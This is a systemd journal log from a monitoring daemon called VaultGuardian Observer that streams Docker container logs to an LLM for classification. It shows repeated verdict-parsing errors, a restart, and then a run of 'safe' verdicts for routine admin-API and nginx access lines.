Mar 19 22:22:13 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842060 [observer] VaultGuardian Observer starting...
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842125 [observer] Normalizer registry initialized
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842184 [observer] Pattern store initialized (0 scopes)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842191 [observer] Analyzer pipeline ready
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842333 [notifier] Generated default config at /var/lib/observer/notifications.yaml
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842646 [logwatch] Notifications:
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842653 [logwatch] ✗ webhook → not configured (set WEBHOOK_URL)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842658 [logwatch] ✗ email → not configured (set RESEND_API_KEY + ALERT_EMAIL_TO)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842661 [logwatch] ✗ sms → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842664 [logwatch] ✗ push/ios → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842668 [logwatch] ✗ push/fcm → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842671 [observer] No notification channels configured — alerts will be logged to stdout only
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842829 [observer] Starting container log watcher...
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891246 [watcher] Found 8 running containers
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891296 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891403 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891421 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891484 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891494 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891567 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891582 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891629 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 22:22:14 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:14.347451 [observer] LLM inference server connected
Mar 19 22:22:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:24.807924 [llm] Failed to parse verdict from:
Mar 19 22:22:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:24.807960 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:24.807969 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:14.623220640Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:22:27 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:27.081033 [llm] Failed to parse verdict from:
Mar 19 22:22:27 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:27.081071 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:22:27 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:27.081079 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:14.624487274Z 98.152.173.124 - - [19/Mar/2026:22:22:14 +0000] "captain.admin.kovicl...
Mar 19 22:22:35 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:35.585944 [llm] Failed to parse verdict from:
Mar 19 22:22:35 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:35.585981 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:35 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:35.585995 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:17.598695335Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:22:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:38.422482 [llm] Failed to parse verdict from:
Mar 19 22:22:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:38.422516 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:22:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:38.422525 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:17.598449224Z 98.152.173.124 - - [19/Mar/2026:22:22:17 +0000] "captain.admin.kovicl...
Mar 19 22:22:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:43.844667 [observer] Pipeline: processed=6 pattern_hits=0 llm_calls=6 llm_errors=4 learned=0
Mar 19 22:22:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:43.844692 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:22:46 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:46.154651 [llm] Failed to parse verdict from:
Mar 19 22:22:46 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:46.154684 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:46 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:46.154693 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:20.596600476Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:22:50 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:50.470486 [llm] Failed to parse verdict from:
Mar 19 22:22:50 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:50.470528 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:22:50 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:50.470556 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:20.596560565Z 98.152.173.124 - - [19/Mar/2026:22:22:20 +0000] "captain.admin.kovicl...
Mar 19 22:22:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:58.084249 [llm] Failed to parse verdict from:
Mar 19 22:22:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:58.084296 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:58.084305 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:23.585019736Z GET /api/v2/user/apps/appData/api 304 1.852 ms - -
Mar 19 22:23:01 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:01.827624 [llm] Failed to parse verdict from:
Mar 19 22:23:01 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:01.827665 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:01 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:01.827674 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:23.585287599Z 98.152.173.124 - - [19/Mar/2026:22:22:23 +0000] "captain.admin.kovicl...
Mar 19 22:23:07 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:07.673829 [llm] Failed to parse verdict from:
Mar 19 22:23:07 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:07.673861 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:07 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:07.673870 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:23.609128033Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:12 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:12.797363 [llm] Failed to parse verdict from:
Mar 19 22:23:12 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:12.797403 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:12 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:12.797412 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:23.609215590Z 98.152.173.124 - - [19/Mar/2026:22:22:23 +0000] "captain.admin.kovicl...
Mar 19 22:23:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:13.844662 [observer] Pipeline: processed=12 pattern_hits=0 llm_calls=12 llm_errors=10 learned=0
Mar 19 22:23:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:13.844686 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=12
Mar 19 22:23:17 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:17.405523 [llm] Failed to parse verdict from:
Mar 19 22:23:17 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:17.405556 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:17 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:17.405564 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:26.596071430Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:24.305237 [llm] Failed to parse verdict from:
Mar 19 22:23:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:24.305273 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:24.305282 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:26.596151066Z 98.152.173.124 - - [19/Mar/2026:22:22:26 +0000] "captain.admin.kovicl...
Mar 19 22:23:28 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:28.586447 [llm] Failed to parse verdict from:
Mar 19 22:23:28 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:28.586499 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:28 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:28.586509 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:29.601912382Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:34.983759 [llm] Failed to parse verdict from:
Mar 19 22:23:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:34.983793 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:34.983802 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:29.602230983Z 98.152.173.124 - - [19/Mar/2026:22:22:29 +0000] "captain.admin.kovicl...
Mar 19 22:23:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:38.918266 [llm] Failed to parse verdict from:
Mar 19 22:23:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:38.918317 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:38.918327 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:32.597046465Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:43.846522 [observer] Pipeline: processed=17 pattern_hits=0 llm_calls=17 llm_errors=15 learned=0
Mar 19 22:23:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:43.846547 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=17
Mar 19 22:23:47 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:47.121504 [llm] Failed to parse verdict from:
Mar 19 22:23:47 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:47.121552 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:47 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:47.121561 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:32.207065844Z 54.200.221.0 - - [19/Mar/2026:22:22:32 +0000] "captain.admin.koviclou...
Mar 19 22:23:49 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:49.513231 [llm] Failed to parse verdict from:
Mar 19 22:23:49 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:49.513269 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:49 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:49.513286 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:35.612384240Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:58.698053 [llm] Failed to parse verdict from:
Mar 19 22:23:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:58.698091 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:58.698100 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:32.597244232Z 98.152.173.124 - - [19/Mar/2026:22:22:32 +0000] "captain.admin.kovicl...
Mar 19 22:24:00 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:00.607082 [llm] Failed to parse verdict from:
Mar 19 22:24:00 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:00.607112 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:00 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:00.607121 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:38.604206059Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:09 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:09.836535 [llm] Failed to parse verdict from:
Mar 19 22:24:09 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:09.836571 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:24:09 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:09.836581 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:33.207372020Z 54.200.221.0 - - [19/Mar/2026:22:22:33 +0000] "captain.admin.koviclou...
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.023397 [llm] Failed to parse verdict from:
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.023428 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.023436 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:41.603260101Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.844504 [observer] Pipeline: processed=23 pattern_hits=0 llm_calls=23 llm_errors=21 learned=0
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.844525 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=23
Mar 19 22:24:21 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:21.104611 [llm] Failed to parse verdict from:
Mar 19 22:24:21 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:21.104658 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:24:21 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:21.104666 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:35.612627471Z 98.152.173.124 - - [19/Mar/2026:22:22:35 +0000] "captain.admin.kovicl...
Mar 19 22:24:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:24.203738 [llm] Failed to parse verdict from:
Mar 19 22:24:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:24.203783 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:24.203793 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:44.593995609Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:30 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:30.905308 [llm] Failed to parse verdict from:
Mar 19 22:24:30 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:30.905353 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:30 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:30.905363 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:47.589386039Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:34.009199 [llm] Failed to parse verdict from:
Mar 19 22:24:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:34.009235 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:24:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:34.009245 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:38.604137431Z 98.152.173.124 - - [19/Mar/2026:22:22:38 +0000] "captain.admin.kovicl...
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138644 [observer] Shutting down...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138857 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: LLM request failed: Post "https://api.openai.com/v1/chat/completions": context canceled
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138867 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:41.602999460Z 98.152.173.124 - - [19/Mar/2026:22:22:41 +0000] "captain.admin.kovicl...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138914 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: LLM request failed: Post "https://api.openai.com/v1/chat/completions": context canceled
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138920 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:50.598703347Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.139278 [observer] Final stats: processed=27 pattern_hits=0 llm_calls=27 learned=0
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.139286 [observer] Shutdown complete
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157467 [observer] VaultGuardian Observer starting...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157516 [observer] Normalizer registry initialized
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157932 [observer] Pattern store initialized (0 scopes)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157944 [observer] Analyzer pipeline ready
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158208 [logwatch] Notifications:
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158217 [logwatch] ✗ webhook → not configured (set WEBHOOK_URL)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158222 [logwatch] ✗ email → not configured (set RESEND_API_KEY + ALERT_EMAIL_TO)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158225 [logwatch] ✗ sms → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158227 [logwatch] ✗ push/ios → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158230 [logwatch] ✗ push/fcm → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158233 [observer] No notification channels configured — alerts will be logged to stdout only
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158492 [observer] Starting container log watcher...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163077 [watcher] Found 8 running containers
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163147 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163255 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163312 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163329 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163379 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163394 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163458 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163543 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.506717 [observer] LLM inference server connected
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.788265 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.788326 [analyzer] Source hint mismatch: LLM says "docker web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.823448 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.86 action=allow pattern_type=contains
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.823485 [analyzer] Source hint mismatch: LLM says "nginx (docker container: captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.577539 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.577628 [analyzer] Source hint mismatch: LLM says "nginx access log inside docker (captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.683319 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.683359 [analyzer] Source hint mismatch: LLM says "docker containerized web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:45.926276 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:24:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:45.926312 [analyzer] Source hint mismatch: LLM says "docker container access logs / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:48.825238 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
